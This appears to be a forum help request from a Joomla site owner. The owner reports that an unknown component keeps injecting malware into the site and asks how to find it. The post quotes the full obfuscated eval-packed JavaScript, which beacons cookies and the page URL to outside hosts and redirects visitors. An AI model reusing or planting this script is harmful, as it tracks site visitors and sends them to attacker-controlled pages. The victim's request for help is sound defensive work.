actually it is visible again!! it would seem that somewhere on the joomla site some component inserts this malware!!!
`<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]c}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('2 58={\'25\':[\'//83.67\',\'//68.72\',\'77://5.82.62.81\'],\'41\':\'/76.75\',\'6\':\'66\',\'61\':37};19 52(){2 3;9{3=26 48("71.60")}11(13){9{3=26 48("80.60")}11(70){3=37}}7(!3&&74 49!=\'65\'){3=26 49()}27 3};19 24(28){2 6=" "+55.6;2 39=" "+28+"=";2 36=15;2 16=0;2 23=0;7(6.14>0){16=6.47(39);7(16!=-1){16+=39.14;23=6.47(";",16);7(23==-1){23=6.14}36=79(6.78(16,23))}}27(36)};19 22(28,54,30,33,35,43){55.6=28+"="+73(54)+((30)?"; 30="+30:"")+((33)?"; 33="+33:"")+((35)?"; 35="+35:"")+((43)?"; 43":"")};(19(8){2 20=24(8[\'6\']);7(20==15)20=0;2 32=24(8[\'6\']+\'69\');7(32==15)32=\'[]\';2 29=24(8[\'6\']+\'46\');7(29==15)29=\'[]\';2 40=\'84=\'+20.57()+\'&98=\'+38(51.102.103)+\'&104=\'+38(32)+\'&105=\'+38(29);2 21=0;2 53=8[\'25\'][21]+8[\'41\'];2 3=52();3.59(\'64\',53,42);3.107("101-108","109/110-111-112-113");3.114=19(){7(3.106==4){7(3.100!=85){++21;7(21>=8[\'25\'].14)27;99=42;3.59(\'64\',8[\'25\'][21]+8[\'41\'],42);3.50(40)}97{9{7(3.63.14==0)27;2 18=45.56(3.63);2 34=\'\';2 17=0;2 44=37;9{34=18[\'96\']}11(13){}9{17=18[\'95\']}11(13){}9{44=(18[\'94\']==1)}11(13){}8[\'61\']=44;7(34.14>0){2 12=26 93();12.92(12.91()+1);7(17>0){22(8[\'6\']+\'90\',17.57(),12.31())}9{22(8[\'6\']+\'89\',18[\'88\'],12.31())}11(13){}7(20==0){22(8[\'6\'],\'1\',12.31())}2 10=15;9{10=45.56(24(8[\'6\']+\'46\'))}11(13){}7(10==15)10=[];7(10.47(17)==-1)10[10.14]=1*17;22(8[\'6\']+\'46\',45.87(10),12.31());51.86(34)}}11(13){}}}};3.50(40)})(58);',10,115,'var|xmlhttp|cookie|if|vAdsObj|try|vM|catch|vDate|e|length|null|offset|iT|Response|function|iStatus|iUrlInd|setCookie|end|getCookie|url|new|return|name|sMS|expires|toUTCString|sMA|path|sCode|domain|setStr|false|encodeURIComponent|search|sPayload|gate|true|secure|bM|JSON|ms|indexOf|ActiveXObject|XMLHttpRequest|send|window|getXmlHttp|sUrl|value|document|parse|toString|vXAdsObj|open|XMLHTTP|mobileresponseText|POST|undefined|xads_platf|at|uads|ma|E|Msxml2|store|escape|typeof|php|g|http|substring|unescape|Microsoft|157|188|myownshop|s|200|eval|stringify|fp|fp|t|getFullYear|setYear|Date|m|t|c|else|u|bByIp|status|Content|location|href|ma|ms|readyState|setRequestHeader|type|application|x|www|form|urlencoded|onreadystatechange'.split('|'),0,{}))
</script>`
Is there any way to figure out where the malware is? maybe in some joomla update? it installs itself automatically
TKS to all!!